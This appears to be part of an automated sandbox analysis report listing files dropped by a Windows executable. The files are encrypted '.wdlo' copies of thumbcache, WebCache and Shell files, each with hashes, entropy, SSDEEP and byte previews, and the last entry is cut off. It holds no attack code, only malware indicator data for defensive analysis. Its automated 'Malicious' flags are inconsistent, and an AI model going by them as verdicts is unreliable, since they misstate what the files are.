                  SHA-512:065130466FC724B76652C086E6346E653293A3BCCE657A2FEB45F646341D16556F653D9653C42F3F35863E554B246FBCE1A33160DC92322D5AADE2139F623D56
                  Malicious:false
                  Preview:CMMM .+..%.......*.9I..k.;....yU,......cq~...~..Z.W....R.... W..[...O.. {..,.<..[.h..C.{bX.......EK@`..MK.......%`.....W.r.....3..k.z.......p.b...;.. A...8..~;F.:..U......d.=.:.(.i1<..0.K.wS.O......6..1.Y0B...n./]....lo.....:..7'.E..|....(..l%|..p..d.bOEd.7i5..x.j.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_wide_alternate.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.29012087694626
                  Encrypted:false
                  SSDEEP:6:ID4l4ccPAYd9CIKt6OZrbaMis31h4drQYzC3Vf8XVJ8fVLaBXaeROsVolWbz6Wcq:b0P3qpt6ORH7FWN7zMVf8j8LM5D36Wcq
                  MD5:3EC4C84C5A13735EE14ACDD8D655131D
                  SHA1:3AB6FF743DB4768A4603CDF3088C07F4D9D35841
                  SHA-256:6D6D79094708775BA0D42BA49166156514C72CDD820669EB180078E2FE7A1F5D
                  SHA-512:E3B411C226A408A0EF39D46E9E2F80330DF12C9AB4E41E11A7B3DB379077A282A956C4D98924F9F4C8C936B4E18CD407A07E2B8196EE66D6E700DFA159CAC34E
                  Malicious:false
                  Preview:CMMM .B..Zy...U....z..bc..+L.\-F..q....i.i..e....;9.OV..1......8i.u......f.!E5..1r.Q...]..rx.....o..!^5v.....TJi^.5..n.%{.>...d.&.x.Gl.O....af.#...F..}... ..J...H..H.o..,v...U5...:Q.....yh...a....z.......".k...F..@JS..^9..O.....W.qs...Z.j.[2.M.......+..&...........ji0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_1280.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.350293502271216
                  Encrypted:false
                  SSDEEP:6:mtsJTruP+Od1ql/FtcasF0sRSckuyeTfE2xBfGR8Fa0BH/Iu6QB2ST5kqWDSvihH:m6u/1GzQFB8LeoWsOa6fI9q1v4D36Wcq
                  MD5:68DB669DA1655E3B611D12B61739FFB9
                  SHA1:1ABAA78C3434EEF753210EFEE99E32D09E19609F
                  SHA-256:FD2FBE8396781C1A0A02F6D50BB9F1F1C7411B5E38A84538C9B207413C291252
                  SHA-512:3EFE712BA9611BBCD73A4C4FDA6F3093487ADBC430CA2320962AA1731DA276975959E79BA606658111433E07DFE7C1D01CEFAC44C9C3E43E819BC8C3B5D95A97
                  Malicious:false
                  Preview:CMMM ....^2l..H..T....&.>XHh...F(.j5y....,...D.\.....k9]..JI%..Z..Nt........?.7.)#2..*.axY..z./.*..+e..c ..P.h_..._..U.P!?&...vxJ...W.>8x. %.6..\.!....$.B..t..Aw%...}.x....G..Z.p.cmz..zb..ne...W[.`K_xG.I-N>@.. V..>....]..|J...iu.%.Q.......`....p....J."..{Xo.Ca.:.....i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_1920.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.171089653337079
                  Encrypted:false
                  SSDEEP:6:TH5Yhg2W6nuBhY47kExQtIzAZHK41cXCUpdH7lO6qPyIUDXqP+qD9e3OsVolWbzD:THkpuTY47+t8Uq8ch3IcqGTx36Wcii9a
                  MD5:A770DDDC747F46B47818FFCA281CAEFF
                  SHA1:8CA318066C14CA068415F10CDC7C450699FD5072
                  SHA-256:82EEBC83172B27766D46CB9C7FC5BBBA1C5B50E5C093EE7B567CAE628468FC4D
                  SHA-512:81B283614AE4FD0D3D41E7E3BD539688742DD06AA14BC79135A9A01F783DEC7AB1114880F801F315E7F2E912047FC35853DEC079EBE1C4BE4AD23C04AE731144
                  Malicious:false
                  Preview:CMMM $.riE-_..h..j\.4;L.[:.YI_f..c.|z.Z0.Ka...t...$c._.A....y...B.O.6p.h+kW.4.*..Q0.yX.X..ya.kJ.<.I.......fd.A..g`......C./H63....yg..r.......q..c..U. .0.$qO'..k.......-Y\h.C..H.-(;...&.....3..l.wb...S.~.8.DW-7UXct.dtW.F....xb^1............Z)...kvff..{{O...m.g....'i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_2560.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.236864661356143
                  Encrypted:false
                  SSDEEP:6:KedDNXcvT8qm+Nunwa21DyxdY6fQmwC4C9OsVolWbz6Wcii96Z:tdBmm+N8wa21D6IV236Wcii9a
                  MD5:756952D68069EA32B570BD6578200791
                  SHA1:7DF8350DBC790C8D708E63191A4988483B15D31B
                  SHA-256:78F7FDCB50B6C21CC8648552E9411A0861A6BF9C45F5824C2E8F330D2EED0AE4
                  SHA-512:1A4A311FD545A2CF085F28195291F7F0FF9ED29B1A44D9284B9A6A8C2521C08A9E6342E117416D958DF97D4EB9F692FFF0852349D456C5DD8E892ADF7A1CA6E7
                  Malicious:false
                  Preview:CMMM ...t....\%..^*...y.c.x..t.XIY.(cQu.~#).....uFwKa62..9.z)"...KH7...k.9h.?.[\Y=..`.q.{.,..R<f.g_.....V*.(.=.{....@....A.!.H9.d.v...Yhzlx...]....... ..X...g%.w]....#GVN.;m.."%..'"...N....{.O.#.@......+d...._.....+..;..+.28)....O.7...Lw....DU...Z%...(.M.(B.....;C.qB.]Qi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_768.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.2700000151645
                  Encrypted:false
                  SSDEEP:6:49KJddilt2sB6r7fTXykc236x2XG7gpq8fasj1VBJAABOsVolWbz6Wcii96Z:VTsIbTXykcEXM8fFRFAAT36Wcii9a
                  MD5:054C6DBFB55C6F0B645367603B609B14
                  SHA1:722E013D6B249357F6A0072A6913E3571F06D463
                  SHA-256:0BB304AFFC858E5B40F19CC038864487E054708F00E694DB3530E1D76C2386E1
                  SHA-512:8D24183D751002CC613F5A4F02A1773E9B1988ECE938BEE20DC47EB2542E8CACB7CE5CA58B8FC03B7F9F8F15427F9491DAE10004C63946224F104184544372E6
                  Malicious:false
                  Preview:CMMM ....1.=...s...0..h.&<.../..ekBY.d...n.3..A.=.;./$..G7{..yOW8g...&N...-..&.....H14.b..4'jP......:.2./oF.9......Jp.P@....6.J.ZS......w=M.Kx#T.j...ed...2IxT.P2n......E..T.&.h...T.O.N.G...x'.....*...K...}...;.......j....0NU...L.d..[..9.02...8\....sS..h..<<.....i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_96.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4194638
                  Entropy (8bit):4.326623816323724
                  Encrypted:false
                  SSDEEP:24576:8WHwbWyPHaVnFNVQ2I8wHXJH9KPauPgnr/GTvYImqrYEz7xiFmi6ft:8WHQbSnFNV+FH9KyuPMr/oeqrYEz7xis
                  MD5:3F297147256D25F602E28DBC93B83E67
                  SHA1:7F59B054BF50EDDC78CB51E60B21592B48E5E1E0
                  SHA-256:9E8F48B1A143AF6A6FF9300DEDFC36B4443F5273C9B9B12480A57594FE0EDCAD
                  SHA-512:7FE5CF33018A9EDFC6CAFA92C3209CC827F4BD7E2142132B7866356C0AC57E72A9FF042C81F58EFFE3D7E2365030DC441E5476A6FA8215862FFEEE12EA04E96D
                  Malicious:false
                  Preview:CMMM .m...eK.....}..I.Z.\#...&.1..hI..V>...r$p2#..^..b....4.B.......N3....L2.z\.....oE...6vH"C..../J.4...+"C->?U...r...s..WN.A.;..uO<...R..y.+...U...J ..+.X3..O4....y..X(w..bi..>...W{.....@.*5?fpp..nC.0....lg.0..~...}.0.F...e.No'..N..0....%.....'.ak...e..~...K..3N..2O|<9R..\b..w.PQAMR..0..V..I..9.O9.`.k#a.-....;.>..#F.%.s...1.2.....uN..u.a..H.S2.*Y./H....i.$....fo.x..<.5T..9.]t.V63......a.J.I.......1.Z+.2..W4...i+Q..4.....^.....).l..3],b.....9.wYp.K...'.".....nw..s.R.`......I...'I..$z...v.4...'R.,g.Wj...oV.;..]p...eT.v;dG...e.S.......Y..;!b<..`.t.[)..k9cd.Q...@.iS.Y&s..N .>C\.b.....?........4.....1.[...SAu..{R..{..~...j.........^...{.Z..m0....z1....'M.J..lJ...i.9..x-;.....~.3.>1.xB*.7.z9.[..,..Lwm..r>C&NI.J..(~.......~S...0.\......V.R....S.U..,..8r..0.....aC..l...J..^..A.k..-.{.9.Y{.\..D....o.Z...5.7uf.M.gA.6..5.m...:"..%.Tf.wy.Qz..g...&.."I....up.r......fT..)G,..Bc.^..;..I.....\JGd....k~..&]P....F.=...p...J.#EiP.F.*pN.s>...T..$....PTw.

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_custom_stream.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.32841558628857
                  Encrypted:false
                  SSDEEP:6:MmXBvcC2ZfpujP7baWwUVBMh1mL7Mv+R1djl6/ajpUF0oKuFVbOsVolWbz6Wciik:MqBUCkIja5UvEkggHjl6epUOqFn36Wcq
                  MD5:541D8D683A35EFD026E162B3DB50C760
                  SHA1:4A23A0D68ED4EC70E92CD873EEEDA535581CD5F5
                  SHA-256:746A37108C5EDCFF289C307D7CB024F98E19839C18C8E623D64BE0B6883A07D4
                  SHA-512:1A9A992F2CB7A72D7DC392440C5A5356E30FEEBB1DC8387ADE3343904C75A613CA16305C79852CAE39884AFFD51E12C78201BFC23BE60E279281EBB6C86E7CBF
                  Malicious:false
                  Preview:CMMM .....$2 F..]...&.Aw.t#.pL...c..d..$.........k'r........FRy...~..::k...._...2[..a..tz...9'Su.....~.%*......./V4J..h...(.4.cq.m6.:P6..~..i....S.e.K.l6o...u...G.....>29....D"...I.....d+......f*.Y.J~..Y..f.....7.j....z).J.._E....R.....$J<......60......~.....Ai0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_exif.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.240100738160811
                  Encrypted:false
                  SSDEEP:6:kiu6r/4dYBcBeEINP7Ly7x8u55FyuMdbLo30Bk9W/mvFdG206P8dOsVolWbz6Wcq:kRdYcetNPax8u55F0fC4S50xn36Wciik
                  MD5:3A2B7D087CC8625771DEB1E550BCBF29
                  SHA1:647161A6B4B469937C7001B5AF2FDF111A6F1CCD
                  SHA-256:EA5BF554FD9B50061F8F240299F39FEC6510CCD872C26B82B1D94A498594A040
                  SHA-512:1178D802E5E3C469F997A21922227C0FB5620C8E388AD1A538273F7F0172775E7E00A7D45E901001F1BF641048F5931E80080DE6952EEE8880738BCD6C2EDC09
                  Malicious:false
                  Preview:CMMM Q.V.jo.._.......g..<....|@7.+b....!.>.*..bH..........<.R.h..e.N&Zy...O..o..:...Njn.n.9S...Y..u......$^v......M.....uK.Q..V.x9:.D.<.......zm...uv.U.+`.T.3Y.cE...u..QZ.....fMt..9-.?X..W..^.:...)x..^.$.+.C.-.4K....J. .2n.gV......."_......#.~C..~.Y...8.^.f.o}B.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_sr.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.304428584883196
                  Encrypted:false
                  SSDEEP:6:uTDT2pYk/CTVhK6CsD1CkOFhnx7mryjvfruDaZoqS6U1rwm9MRwROsVolWbz6Wcq:u6Yk/aD1CRFhx7mryTgqA6URwvCD36WX
                  MD5:334490224943C71A65B8985795C0CA66
                  SHA1:BCD965555CD5B0775520E7CE3D9C226B6D212273
                  SHA-256:C700F29E24F7A456B1051A1DFCFE1D952B29F17D7343A7C086D35E17689CB98F
                  SHA-512:4BFC5BD68B69E5AC431DD8F81B5BCA098BC54BF524FA739D15820E7705F8AECA58B21F4BC177B7EB5C50F20379E0381685FA5F8CA58A4D24A03EC0BE3E2DE846
                  Malicious:false
                  Preview:CMMM vY.e.>p.q...IphX....$L'*.>K..=.I.B\..........h.........".<.t.N....O.bd....T...=...X....W.#&yk.3'...3...I..L.RA...Z.DE)1..E...F..Q..R.&.=...g....O..2...h...n...-..U.lS..g5i.\.'.RhNcH..R|...../T.0.C ....5_;.K...d.d....5..^....#_.5....%}...{.2.....o....\4...2&;><..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_wide.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.277234904733729
                  Encrypted:false
                  SSDEEP:6:BSo7IQfH0/NprA6UVQEE+jvmEN3n2yQAo5Camy/D1BOsVolWbz6Wcii96Z:97IQfGHU625jvmEN3n1QHcwF36Wcii9a
                  MD5:0BC68ABA6E1D1D62D3FDF75A90133254
                  SHA1:84EA551AA60181CE1D309A05170C023484E7E849
                  SHA-256:AB23BB081FA95DE63F6091604A0B016E840483A663F6FDF41B75E6AFCF47460E
                  SHA-512:307F7FB6D5690AA0332BABDD209BC99748E59737D5EDD8A6203B7E9C0BE8EF832ADC5F2957C5753213D362FCE4B9EC8F56861E58900132663C89F49BD41ABC13
                  Malicious:false
                  Preview:CMMM ...Y..R....yu.Jr.K;....S..Dp?...9.s.=....?........=.x...wp8.k.r2n.b?=@@....v.....~.&..K'..N..].6....M.D..Z.yQ...%R..H......R..1>.0.9.....i.A...@Oq2..eR.C;[d64.\..6.zL...@*.}O.,...R8O....e%......niI^.0>h.b...{wV#...h....e.J'Qb...H.n\....s..!...eT4...xc..N.`AWi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.294039408730942
                  Encrypted:false
                  SSDEEP:6:C+sfCdJOZ9JhaSZzLH5YXFVKRi17aFR8lb89o52rkMqfyUE71BOsVolWbz6Wciik:xsfCd4a0eX6REaibj5Drix36Wcii9a
                  MD5:277C0908CDB857DE1439D9E22A7B3F18
                  SHA1:0FE9BC773ECB0301DA81682FBFBFBA2931A7C425
                  SHA-256:7D967E7C0E647D296B5B4EABEFD3284CAAD5D9CA874FF700DE1931CA94DA8007
                  SHA-512:1C0A4958A2BE21A57308AEE24C439CB7BB44645FB55628766998C7B57918792765AB7CF12860F12009F23A0E43B7CA99CE74E6132328EA7515B509A2E89C498C
                  Malicious:false
                  Preview:CMMM ..z.>I|.2...P.......=g{.5m@.....v'|......[.6..|...8..Al....I.....5.S.9.}..x............of.u).q....#E...H~..z.....K.a.v...%..Q%x....de........m..aG6Tk..s..J..|..3....8...O......&.J...H..._.."r...j`..O....Z.BdprP.i6..B....oR.N'...O4.m...2U..<..N..\..c{e....L?..Ci0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64281
                  Entropy (8bit):7.997621742266017
                  Encrypted:true
                  SSDEEP:1536:NpnpRZEQDnGp9yi1c+85kYxOhXSX+YfzYFxeRsOpPJ7H:bnFEQDGp9v1cTa6OY/bcx0px7H
                  MD5:AB02FCDAE1C04070CA3685D15EE1065E
                  SHA1:FAD3CB9257F1BD586385B52780F8A242FDC41044
                  SHA-256:041E7283845F1AEF1D202DA64F9C0DDD68F97C02C1757CCD3EB8F6982A6D2386
                  SHA-512:53172B2137880B6D881CA800443CA8E339E9D6F3296C3D2EC9320E02A85FC5C17BC31AFB19434B0C7B70FB2F8AF8E717EBC7004212E21F2CC28D17B1C4F637A0
                  Malicious:true
                  Preview:<?xml.&I.&5..e....^.........E..R~p9.Z....>l.e.yCY,...p......3..k. .W.y...H..@=...O.'.B.....Yr....<??k_....4,h"v...]Nu....c.T.......E.B.CP....].........V(..*....j.7E$A..w.....}..H!.l&.aK..P.b..._.....m.5..jp.E....W.ZqXA"~.....&.e...7FO.\.[.....X.y..1...R.#=C...-op.X..9........)noP..!.f.:.T....[8...-.t.{2H......U.B...R..1#...'.O..1.X..kq....?m.f)...;.d.U@Y.][..].m...LR...*..FA.W.kD.....:..[...H.....;"\2R(...8....G..2Eu|n.6.E{....~..t..cOl2J...i...Y.E.9.......u*.V.U.c:f+32.;/.....t:..........~... )'...H..n.T.....!...*..@..z.x1....)....hA.0..?3D...C....>......3...!.Nt..>..f.6.......A...KA.......m.1......$7.....2.....,.pDqv...fO.Y.0Z.._)9~O.A.bVyh)T..O....i......gK.3..N.BA..g6......%^\.R6....^..g.sF..l.@.ww....+.....a...,...V..G.*.F..\]..[3.c..@.+{~.u......hwT.P..U.:...o(.i.|...*..>.}..DG.......z{..JO.'.G..).y.s=:~....."\..y.[.._.Yc,.....[..DDL..4.Y.f..f-Y9..B!....`.+B.8.ae..HW<..J.*O..o&....0+U...HLy..7.....U@..p.k.=.p.[.ty....".y.

                  C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01.chk.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975560537200802
                  Encrypted:false
                  SSDEEP:192:CRzQI9ewkOQNJ1XnDzyNJzxZ9MQ/xtShc2znwO7D0+1xR7nm0NinVH:e6LNJ1XnDzuNFZ36nwYDhx2VH
                  MD5:669CE2B3B4767819465B232CB731D449
                  SHA1:E23B212660EF367E9A45D79BAAED2B92586F9408
                  SHA-256:891BCC6CCA2B37B473EDF88AF954FF848D790F7DBDF40948BECC9BD8322B9F2E
                  SHA-512:A781ABB488D3DFE6A0F09295128E8DA69D9753004EBB3D393741B579328411DA2226ABBA2E9919FCF7573F01C13F42E7B3A0F1F6F6365C0534A245AEDEA02CC2
                  Malicious:false
                  Preview:.p.|........ .).NVb....k.%.;.i......9...^.u.Af(......>U#..36P.....~%) .r1 ...N.-.'..Z.!...v].....Y..g;.....&T..V@=|.........M,)....6.j.....K....?..l./..H......ay.....A~...(....Za...ehWtV..8.}P.......[%..^.r..F..*..rxo.........3...k .`./+..T......rU@fKj..Q.X|...4.N...m@;..n...D.[..9..#.Byz...6...L..D..H*ep.R...F...b..8u.3..7~M9.~df.0...b.8g.R...I.t.......H..-..Z}-............?...P{.y.*$.91..`..O.WF}......e.....)..b...p.8.7@......G.tX L\...`.E..5..HJ...W*`.[...7.1[.....3.."..R....6v).q......c.D>........So...:G..^....:4U.~m.V.GrM..R\.O......U.p.a........I................"...d.f.,dI....0.bei..A.|..ecDppZ.5.W...}.p'...G3.f..n$4.^....q..S~.......W6.r......_.}...~}...H\..C@,..P].h>.".h._...U.G!......X.b.D....J...GC.....E.....{.-.|p.......a.%.1....^...H..#%43.o..n...w+.g......`..7.V....Q.I..m.....4...Y..E=g..oF.K.v....A..<R.'..;Hv........aD.....a.8i..B..K8..."nh..;...O.s\....y...w.H..qr.#.e>U.H..i._...."..t.T..?.#...|...*..b8..U...i9.ht.W/5$D....O..

                  C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V0100004.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):7.012358618276437
                  Encrypted:false
                  SSDEEP:6144:Iy1MoligirXV2+kknVTlBcmwBJeQNy6tsM0P8ATX1BK8O2Jzy:I6lig2o+ZnHBnyyg
                  MD5:7291D2B28FD52382F66319FBB82A786A
                  SHA1:C970F6E1B0238B93DE18F5D3DEFAA8C621F3B76F
                  SHA-256:14AC6DAFAC11CFF1D8CD1E6F0DD6D4E0B0B3FB7BA810339DB6589BF296E079BB
                  SHA-512:8B42F3F3F24D9931CCC77A071E764DAAF99A5E1EA4FB11A38AB694BCC58D64B8BA48B1A746F92D5181511537778E213F06C59B52EB821B99AF725C9399701E8C
                  Malicious:false
                  Preview:w.I`...9.H:-|<0.z.s...&.\..k.}j........a+.7.pR.*........b......M9...8....y.J..z...;/..!<J.... .*. .d....%...|....}.....C...$.Wn.9.>R8e-:h...H0.L.~^DX.O....-.V.w<..q.rhm.4...!...6..`.,T<JA:<.....a<......W.v9s.50..'....N;..@1G....I.E.....3..F.....o.y].Wu">;$F..c......Q.!.\#3....!B..Y"..j900.t39R.$..... x.....# .e:...f..Bl...*.P.a...........!.w%...R....Jz.3K>.A....;l.K....b...%.a)8az(.....'..3..S..EO..>..I.+......7.be5....o...2p.].E.V.d.,./1.d..{Vt:Ve4...R..]......Hh6.&........M...c...#.F.2.,.W.2.;D..q.r....\....C...#..bt..d .\R.)v.:..)On.q..m.z..~?.=....a.~FS.........A.P....~.uCr.....#$......N.u.{.co!.....FK..N.r...5z...GWW..mY..jb../..r.I...}....(....z.T....L|..<.WTYj...MK...Y.a<81........*..X_.rq/..P%.1W..-.....p..e...|q.O.[p8..2..q..3.m..s1J.].A..LU.....t.s...k..j...5T....4.{...-l.QK......_x.Z..}..........I@Cj$F.;..Q..... ..rd......"...}.W.cY67...F.n........f.q.T....}..hR@.n4.'..\[.C..\^t.............).....P.....u9...$.....`...

                  C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01res00001.jrs.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):3.208075888208003
                  Encrypted:false
                  SSDEEP:3072:ehuof9S4pwyA6kjOoQHx33ErK5eXFmIft5PbbtGA03s5MGlQKUR1h:ehPWyAHOLkrK5eYIjjbj0852vh
                  MD5:81306AA20ECAF3AD91322BC1B1A2AD3A
                  SHA1:A65AA4C2C4BEB7B51C0318AB56B0BE6A3486C210
                  SHA-256:819DC540624E110C36CE185DE863409D29D80191FE25C11537E6D00E24F56C79
                  SHA-512:9116AE298B4BEE88DF34DFB913CF1FB30653DF926B3A99D5FBDA049745962DC132290590DA9CB691AA5F17AF05D8D8BD70ABDA4909EEFE919DA5A154DEFD0CB9
                  Malicious:false
                  Preview:........'..?..(l..........B..] .{.......%...J.z|..S.........x..>[..-...B..W.V........$v...F....OUI..DTFR.....(,..X..63'#.y..3.....'..N..Aq.a.X4..#.\.......57.U....y..?.V..@oR.s.c.l...].N...;... ==..2c<.0.G..R=&.o.E.K.zJ......\+....~.....z.@d..7Y.......././......1...v...W.&z...,@h.g..27k3.[.5./...t.n....dl..]2.....S.:...........=...1.y&......N.j/..~".At.+.....'#n"..8..w.]..P.21)...%............}...;.<9..T...Y....M.>.....$W.../..v.......,^.p[g.F.X.d.^V.W...N.dL.[...J..:P..7$L..H.O8)Z.*....8.A...D..]o.WO[........pY0,...W\..'...O!..Q2r....a.6.dH...E....2..a.U#..*.n%.. ........(.f.....4g....:..Y......O.....hE..n/|..X..%w..w..Iz.3.$...X....n......}...<}..6.8...;\...5...)....<R....:v.\......ds{0m....!s..CX.".a9.n.....y..~.Bp.B......?...Aukuo.1= .a.5\.2c..y.PY......+.. r/.clbC=.2a....+...;b.....E...*i..o.(.......5.ND)F....W.Q.5!T.mk......... L..R..P..*....Mv.*Q|X....f.G....J....;./.E.!wy)w.h$P.0.V.F...G".i. x..::3....gm.......?.!..Uz....a..xL..w....

                  C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01res00002.jrs.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):3.207051396112078
                  Encrypted:false
                  SSDEEP:3072:U9tdHvJDPW2+I/6lVOwTBqYImm7Nh3DYLIig7PedgxmSmhBrKAwFaf:QPe7I/6bPImmLAIi/2mSmrrK7af
                  MD5:7500A8656CFF36127908862B7ED507B1
                  SHA1:85F382E12B5C2363C13A0D495856A58DBCA4C3DD
                  SHA-256:1D70C7CDA03DD44C11E232F5D46B97EEC0A0DB695672EAE587A5FE0849A1A31B
                  SHA-512:34EA4FDE2A27AEED6ADA7E3232CDFC78ED64AB1183265348E18E48E5DAE3804120F207DACF2FDA0834D57AA8935A938B35073740C2BC9BF7FA17EEF747FACBCB
                  Malicious:false
                  Preview:.....at$..t.4liJ....".h....L.dl~~.J...P..n.............K%.m..:q..rI...".%..t.W..-r.E....}.E&.I*wO........[bKE9...e.R..2.4D..].F..F..6.3......v./...|p5;M.G.8]4...n..@Gs..u....*..u.4.......x...W..$%..(4y+..'Bg.X.}..-.:..6..H..4.)4..-[..;F...K.3.....{.b..!K.'..&...,..?@ .l.%.......JyW./......[}...`..&..G...=.ID.C.h..a.3s~.O........s.+...HX.wk...=.|.u]..lZ.../...?..H.....|.\.3..*.....".?..m.1;UH!...)2zR......&.V...O=.>.-.w.S>%hH^..P..._.C)p.]i..c.P\..._qa....3...l..@".`.3....z.m.}_.k....+.c.....j#?...F..'*..0+.......{.6.C.!.......~..../.s..."..h.B.~...~k.h..t.>;...n.&...+.}.....W.m ....]......n...L.o5(........2.........C%2sR..........&P.>.j..{..r.Drr...c...@.e@..Bh..O...J..1Q.<.G.u.v.i.H.~.]af.2%&2.8..wH...w...~........4...5..W.K.*..Y...3.#."l>.K...(.t?:o.j.S.|..Bg....#.c.x.^...}'[..8}...A....D_..v...vO.m.t5s.!;.m .Q.....m..#;.Evi0`....M.B..T)>.......h..+l.....Dg....Z"6.....[.+......J...B.2.,...9..W.P#.".ptz).........}B..Z_.]p".R.jB..3...

                  C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01tmp.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):6.665508136536217
                  Encrypted:false
                  SSDEEP:6144:veN1IKXgks9V+719PNYqODlnOK0eBQ6GuwlcTKcBwqGQguuleoxvTxcZxBvxdhv/:aJgks9C1FNYFDlnvglttEjx/
                  MD5:64909FF32120097203C19048956927BB
                  SHA1:601CA1AB12CABB5372948330AC8BA262F614F7D2
                  SHA-256:805D3B091216F7F6A38A9E09EA246C7CE1E8D58FA0D93CF277773D5C76A94024
